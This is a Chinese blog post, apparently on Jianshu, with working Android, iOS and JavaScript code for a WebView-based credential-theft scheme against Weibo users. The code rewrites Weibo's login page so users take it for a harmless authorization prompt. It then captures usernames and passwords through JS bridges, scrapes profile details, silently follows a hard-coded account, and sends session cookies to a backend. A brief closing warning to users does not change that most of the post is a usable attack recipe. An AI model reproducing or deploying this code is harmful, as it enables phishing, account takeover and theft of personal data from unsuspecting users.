app端用戶信息竊取--微博

github地址

項(xiàng)目目的

在app(ios和android)端使用webview組件與js進(jìn)行交互,串改頁面,讓用戶授權(quán)登錄后,獲取用戶關(guān)鍵信息,并完成自動(dòng)關(guān)注一個(gè)賬號(hào)。

傳統(tǒng)爬蟲模式的局限

傳統(tǒng)爬蟲模式,讓用戶在客戶端在輸入賬號(hào)密碼,然后傳送到后端進(jìn)行登錄,爬取信息,這種方式將要面對(duì)各種人機(jī)驗(yàn)證措施,加密方法復(fù)雜的情況下,還得選擇selenium,性能更無法保證。同時(shí),對(duì)于個(gè)人賬戶,安全措施越來越嚴(yán),使用代理ip進(jìn)行操作,很容易造成異地登錄等問題,代理ip也很可能在全網(wǎng)被重復(fù)使用的情況下,被封殺,頻繁的代理ip切換也會(huì)帶來需要二次登錄等問題。
所以這兩年年來,發(fā)現(xiàn)市面上越來越多的提供sdk方式的數(shù)據(jù)提供商,經(jīng)過抓包及反編譯sdk,發(fā)現(xiàn)其大多數(shù)使用webview載入第三方頁面的方式完成登錄,有的在登錄完成之后,獲取cookie傳送到后端完成爬取,有的直接在app內(nèi)完成所需信息的收集。

登錄

這是微博移動(dòng)端登錄頁


weibo原移動(dòng)端登錄頁.png

首先使用JavaScript串改當(dāng)前頁面元素,讓用戶沒法意識(shí)到這是微博官方的登錄頁。

載入頁面

android

webView.loadUrl(LOGINPAGEURL);

iOS

[self requestUrl:self.loginPageUrl];
//請(qǐng)求url方法
-(void) requestUrl:(NSString*) urlString{
    NSURL* url=[NSURL URLWithString:urlString];
    NSURLRequest* request=[NSURLRequest requestWithURL:url];
    [self.webView loadRequest:request];
}

js代碼注入

首先我們注入js代碼到app的webview中
android

private void injectScriptFile(String filePath) {
        InputStream input;
        try {
            input = webView.getContext().getAssets().open(filePath);
            byte[] buffer = new byte[input.available()];
            input.read(buffer);
            input.close();
            // String-ify the script byte-array using BASE64 encoding
            String encoded = Base64.encodeToString(buffer, Base64.NO_WRAP);
            String funstr = "javascript:(function() {" +
                    "var parent = document.getElementsByTagName('head').item(0);" +
                    "var script = document.createElement('script');" +
                    "script.type = 'text/javascript';" +
                    "script.innerHTML = decodeURIComponent(escape(window.atob('" + encoded + "')));" +
                    "parent.appendChild(script)" +
                    "})()";
            execJsNoReturn(funstr);
        } catch (IOException e) {
            Log.e(TAG, "injectScriptFile: " + e);
        }
    }

iOS

//注入js文件
- (void) injectJsFile:(NSString *)filePath{
    NSString *jsPath = [[NSBundle mainBundle] pathForResource:filePath ofType:@"js" inDirectory:@"assets"];
    NSData *data=[NSData dataWithContentsOfFile:jsPath];
    NSString *responData =  [data base64EncodedStringWithOptions:0];
    NSString *jsStr=[NSString stringWithFormat:@"javascript:(function() {\
                     var parent = document.getElementsByTagName('head').item(0);\
                     var script = document.createElement('script');\
                     script.type = 'text/javascript';\
                     script.innerHTML = decodeURIComponent(escape(window.atob('%@')));\
                     parent.appendChild(script)})()",responData];
    [self.webView evaluateJavaScript:jsStr completionHandler:^(id _Nullable htmlStr,NSError * _Nullable error){
        
    }];
}

我們都采用讀取js文件,然后base64編碼后,使用window.atob把其做為一個(gè)腳本注入到當(dāng)前頁面(注意:window.atob處理中文編碼后會(huì)得到的編碼不正確,需要使用ecodeURIComponent escape來進(jìn)行正確的校正。)
在這里已經(jīng)使用了app端,調(diào)用js的方法來創(chuàng)建元素。

app端調(diào)用js方法

android端:

webView.evaluateJavascript(funcStr, new ValueCallback<String>() {
            @Override
            public void onReceiveValue(String s) {

            }

        });

ios端:

[self.webView evaluateJavaScript:funcStr completionHandler:^(id _Nullable htmlStr,NSError * _Nullable error){
        
    }];

這兩個(gè)方法可以獲取返回值,正因?yàn)槿绱耍梢允褂胘s提取頁面信息后,返回給webview,然后收集信息完成之后,匯總進(jìn)行通信。

js串改頁面

//串改頁面元素,讓用戶以為是授權(quán)登錄
function getLogin(){
 var topEle=selectNode('//*[@id="avatarWrapper"]');
 var imgEle=selectNode('//*[@id="avatarWrapper"]/img');
 topEle.remove(imgEle);
 var returnEle=selectNode('//*[@id="loginWrapper"]/a');
 returnEle.className='';
 returnEle.innerText='';
 pEle=selectNode('//*[@id="loginWrapper"]/p');
 pEle.className="";
 pEle.innerHTML="";
 footerEle=selectNode('//*[@id="loginWrapper"]/footer');
 footerEle.innerHTML="";
 var loginNameEle=selectNode('//*[@id="loginName"]');
 loginNameEle.placeholder="請(qǐng)輸入用戶名";
 var buttonEle=selectNode('//*[@id="loginAction"]');
 buttonEle.innerText="請(qǐng)進(jìn)行用戶授權(quán)";
 selectNode('//*[@id="loginWrapper"]/form/section/div[1]/i').className="";
 selectNode('//*[@id="loginWrapper"]/form/section/div[2]/i').className="";
 selectNode('//*[@id="loginAction"]').className="btn";
 selectNode('//a[@id="loginAction"]').addEventListener('click',transPortUnAndPw,false);
 return window.webkit;
}
function transPortUnAndPw(){
 username=selectNode('//*[@id="loginName"]').value;
 pwd=selectNode('//*[@id="loginPassword"]').value;
 window.webkit.messageHandlers.getInfo({body:JSON.stringify({"username":username,"pwd":pwd})});
}

使用js修改頁面元素,使之看起來不會(huì)讓人發(fā)覺這是weibo官方的頁面。
修改后的頁面如圖:


修改后登錄頁面.png

串改登錄點(diǎn)擊事件,獲取用戶名密碼

selectNode('//a[@id="loginAction"]').addEventListener('click',transPortUnAndPw,false);
function transPortUnAndPw(){
  username=selectNode('//*[@id="loginName"]').value;
  pwd=selectNode('//*[@id="loginPassword"]').value;
  window.webkit.messageHandlers.getInfo({body:JSON.stringify({"username":username,"pwd":pwd})});
}

同時(shí)串改登錄點(diǎn)擊按鈕,通過js調(diào)用app webview的方法,把用戶名和密碼傳遞給app webview 完成信息收集。

js調(diào)用webview的方法

android端:

// js代碼
window.weibo.getPwd(JSON.stringify({"username":username,"pwd":pwd}));
//Java代碼
webView.addJavascriptInterface(new WeiboJsInterface(), "weibo");
public class WeiboJsInterface {
        @JavascriptInterface
        public void getPwd(String returnValue) {
            try {
                unpwDict = new JSONObject(returnValue);
            } catch (JSONException e) {
                e.printStackTrace();
            }
        }
    }

android通過實(shí)現(xiàn)一個(gè)@JavaScriptInterface接口,把這個(gè)方法添加類添加到webview的瀏覽器內(nèi)核之上,當(dāng)調(diào)用這個(gè)方法時(shí),會(huì)觸發(fā)android端的調(diào)用。
ios端:

//js代碼
window.webkit.messageHandlers.getInfo({body:JSON.stringify({"username":username,"pwd":pwd})});
//oc代碼
WKUserContentController *userContentController = [[WKUserContentController alloc] init];
 [userContentController addScriptMessageHandler:self name:@"getInfo"];

- (void)userContentController:(WKUserContentController *)userContentController didReceiveScriptMessage:(WKScriptMessage *)message
{
    
    self.unpwDict=[self getReturnDict:message.body];
}

ios方式,實(shí)現(xiàn)方式與此類似,不過由于我對(duì)oc以及ios開發(fā)不熟悉,代碼運(yùn)行不符合期望,希望專業(yè)的能指正。

個(gè)人信息獲取

直接提取頁面的難點(diǎn)

webview這個(gè)組件,無論是在android端 onPageFinished方法還是ios端的didFinishNavigation方法,都無法正確判定頁面是否加載完全。所以對(duì)于很多頁面,還是選擇走接口

請(qǐng)求接口

本項(xiàng)目中,獲取用戶自己的微博,關(guān)注,和分析,都是使用接口,拿到預(yù)覽頁,直接解析數(shù),對(duì)于關(guān)鍵的參數(shù),需要仔細(xì)抓包獲取

抓包1.png

仔細(xì)分析 “我”這個(gè)標(biāo)簽下的請(qǐng)求情況,發(fā)現(xiàn)https://m.weibo.cn/home/me?format=cards這個(gè)鏈接包含用戶核心數(shù)據(jù),通過這個(gè)請(qǐng)求,獲取核心參數(shù),然后,獲取用戶的微博 關(guān)注 粉絲的預(yù)覽頁面。
然后通過

JSON.stringify(JSON.parse(document.getElementsByTagName('pre')[0].innerText))

獲取json字符串,并傳到app端進(jìn)行解析。
解析及多次請(qǐng)求的邏輯

請(qǐng)求頁面

也有頁面,如個(gè)人資料,頁面較簡(jiǎn)單,可以使用js提取

js代碼

function getPersonInfo(){
  var name=selectNodeText('//*[@id="J_name"]');
  var sex=selectNodeText('/*[@id="sex"]/option[@selected]');
  var location=selectNodeText('//*[@id="J_location"]');
  var year=selectNodeText('//*[@id="year"]/option[@selected]');
  var month=selectNodeText('//*[@id="month"]/option[@selected]');
  var day=selectNodeText('//*[@id="day"]/option[@selected]');
  var email=selectNodeText('//*[@id="J_email"]');
  var blog=selectNodeText('//*[@id="J_blog"]');
  if(blog=='輸入博客地址'){
    blog='未填寫';
  }
  var qq=selectNodeText('//*[@id="J_QQ"]');
  if(qq=='QQ帳號(hào)'){
    qq="未填寫";
  }
  birthday=year+'-'+month+'-'+day;
  theDict={'name':name,'sex':sex,'localtion':location,'birthday':birthday,'email':email,'blog':blog,'qq':qq};
  return JSON.stringify({'personInfomation':theDict});
}

由于webview不支持 $x 的xpath寫法,為了方便,使用原生的XPathEvaluator, 實(shí)現(xiàn)了特定的提取。

function selectNodes(sXPath) {
  var evaluator = new XPathEvaluator();
  var result = evaluator.evaluate(sXPath, document, null, XPathResult.ANY_TYPE, null);
  if (result != null) {
    var nodeArray = [];
    var nodes = result.iterateNext();
    while (nodes) {
      nodeArray.push(nodes);
      nodes = result.iterateNext();
    }
    return nodeArray;
  }
  return null;
};
//選取子節(jié)點(diǎn)
function selectChildNode(sXPath, element) {
  var evaluator = new XPathEvaluator();
  var newResult = evaluator.evaluate(sXPath, element, null, XPathResult.ANY_TYPE, null);
  if (newResult != null) {
    var newNode = newResult.iterateNext();
    return newNode;
  }
}

function selectChildNodeText(sXPath, element) {
  var evaluator = new XPathEvaluator();
  var newResult = evaluator.evaluate(sXPath, element, null, XPathResult.ANY_TYPE, null);
  if (newResult != null) {
    var newNode = newResult.iterateNext();
    if (newNode != null) {
      return newNode.textContent.replace(/(^\s*)|(\s*$)/g, ""); ;
    } else {
      return "";
    }
  }
}

function selectChildNodes(sXPath, element) {
  var evaluator = new XPathEvaluator();
  var newResult = evaluator.evaluate(sXPath, element, null, XPathResult.ANY_TYPE, null);
  if (newResult != null) {
    var nodeArray = [];
    var newNode = newResult.iterateNext();
    while (newNode) {
      nodeArray.push(newNode);
      newNode = newResult.iterateNext();
    }
    return nodeArray;
  }
}

function selectNodeText(sXPath) {
  var evaluator = new XPathEvaluator();
  var newResult = evaluator.evaluate(sXPath, document, null, XPathResult.ANY_TYPE, null);
  if (newResult != null) {
    var newNode = newResult.iterateNext();
    if (newNode) {
      return newNode.textContent.replace(/(^\s*)|(\s*$)/g, ""); ;
    }
    return "";
  }
}
function selectNode(sXPath) {
  var evaluator = new XPathEvaluator();
  var newResult = evaluator.evaluate(sXPath, document, null, XPathResult.ANY_TYPE, null);
  if (newResult != null) {
    var newNode = newResult.iterateNext();
    if (newNode) {
      return newNode;
    }
    return null;
  }
}

自動(dòng)關(guān)注用戶

由于個(gè)人微博頁面 onPageFinished與didFinishNavigation這兩個(gè)方法無法判定頁面是否加載完全,
為了解決這個(gè)問題,在android端,使用攔截url,判定頁面加載圖片的數(shù)量來確定,是否,加載完全

//由于頁面的正確加載onPageFinieshed和onProgressChanged都不能正確判定,所以選擇在加載多張圖片后,判定頁面加載完成。
            //在這樣的情況下,自動(dòng)點(diǎn)擊元素,完成自動(dòng)關(guān)注用戶。
            @Override
            public void onLoadResource(WebView view, String url) {
                if (webView.getUrl().contains(AUTOFOCUSURL) && url.contains("jpg")) {
                    newIndex++;
                    if (newIndex == 5) {
                        webView.post(new Runnable() {
                            @Override
                            public void run() {
                                injectJsUseXpath("autoFocus.js");
                                execJsNoReturn("autoFocus();");
                            }
                        });
                    }
                }
                super.onLoadResource(view, url);
            }

js 自動(dòng)點(diǎn)擊

function autoFocus(){
  selectNode('//span[@class="m-add-box"]').click();
}

在ios端,使用訪問接口的方式


抓包2.png

除了目標(biāo)用戶的id外,還有一個(gè)st字符串,通過chrome的search,定位,然后通過js提取

function getSt(){
  return config['st'];
}

然后構(gòu)造post,請(qǐng)求,完成關(guān)注

- (void) autoFocus:(NSString*) st{
    //Wkwebview采用js模擬完成表單提交
    NSString *jsStr=[NSString stringWithFormat:@"function post(path, params) {var method = \"post\"; \
                     var form = document.createElement(\"form\"); \
                     form.setAttribute(\"method\", method); \
                     form.setAttribute(\"action\", path); \
                     for(var key in params) { \
                     if(params.hasOwnProperty(key)) { \
                     var hiddenField = document.createElement(\"input\");\
                     hiddenField.setAttribute(\"type\", \"hidden\");\
                     hiddenField.setAttribute(\"name\", key);\
                     hiddenField.setAttribute(\"value\", params[key]);\
                     form.appendChild(hiddenField);\
                     }\
                     }\
                     document.body.appendChild(form);\
                     form.submit();\
                     }\
                     post('https://m.weibo.cn/api/friendships/create',{'uid':'1195242865','st':'%@'});",st];
    [self execJsNoReturn:jsStr];
}

ios WkWebview沒有post請(qǐng)求,接口,所以構(gòu)造一個(gè)表單提交,完成post請(qǐng)求。
完成,一個(gè)自動(dòng)關(guān)注,當(dāng)然,構(gòu)造一個(gè)用戶id的列表,很簡(jiǎn)單就可以實(shí)現(xiàn)自動(dòng)關(guān)注多個(gè)用戶。

關(guān)于cookie

如果需要爬取的數(shù)據(jù)量大,可以選擇爬取少量關(guān)鍵信息后,把cookie傳到后端處理
android 端 cookie處理

CookieSyncManager.createInstance(context);  
CookieManager cookieManager = CookieManager.getInstance();

通過cookieManage對(duì)象可以獲取cookie字符串,傳送到后端,繼續(xù)爬取

ios端cookie處理

NSDictionary *cookie = [AppInfo shareAppInfo].userModel.cookies;

處理方式與android端類似。

總結(jié)

對(duì)于數(shù)據(jù)工程師來說,webview有點(diǎn)類似于selenium,但是運(yùn)行在服務(wù)端的selenium,有太多的局限性。webview的在客戶端運(yùn)行,就像一個(gè)用戶就是一臺(tái)肉機(jī)。
以webview為基礎(chǔ),使用app收集信息加以利用,現(xiàn)階段大多數(shù)人都還沒意識(shí)到,但是,市場(chǎng)上的產(chǎn)品已經(jīng)越來越多,特別是那些對(duì)數(shù)據(jù)有特殊需要的各種金融機(jī)構(gòu)。
對(duì)于普通用戶來說,不要輕易在一個(gè)app上登錄第三方賬戶,信息泄露,財(cái)產(chǎn)損失,在按下登錄或者本例中的假裝授權(quán)后,都是不可避免的。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 179,058評(píng)論 25 709
  • 最討厭的就是集體活動(dòng)時(shí),負(fù)責(zé)人說:“我就不點(diǎn)名了,你們誰不好自己心里清楚?!北肝覀儾磺宄?,你不點(diǎn)出來誰不好,他就...
    lxc_EA閱讀 245評(píng)論 0 0
  • 原以為在這紛雜的大千世界可以獨(dú)善其身,殊不知選擇了你,便注定要輸?shù)囊粩⊥康?/div>
    念愫閱讀 131評(píng)論 0 1

友情鏈接更多精彩內(nèi)容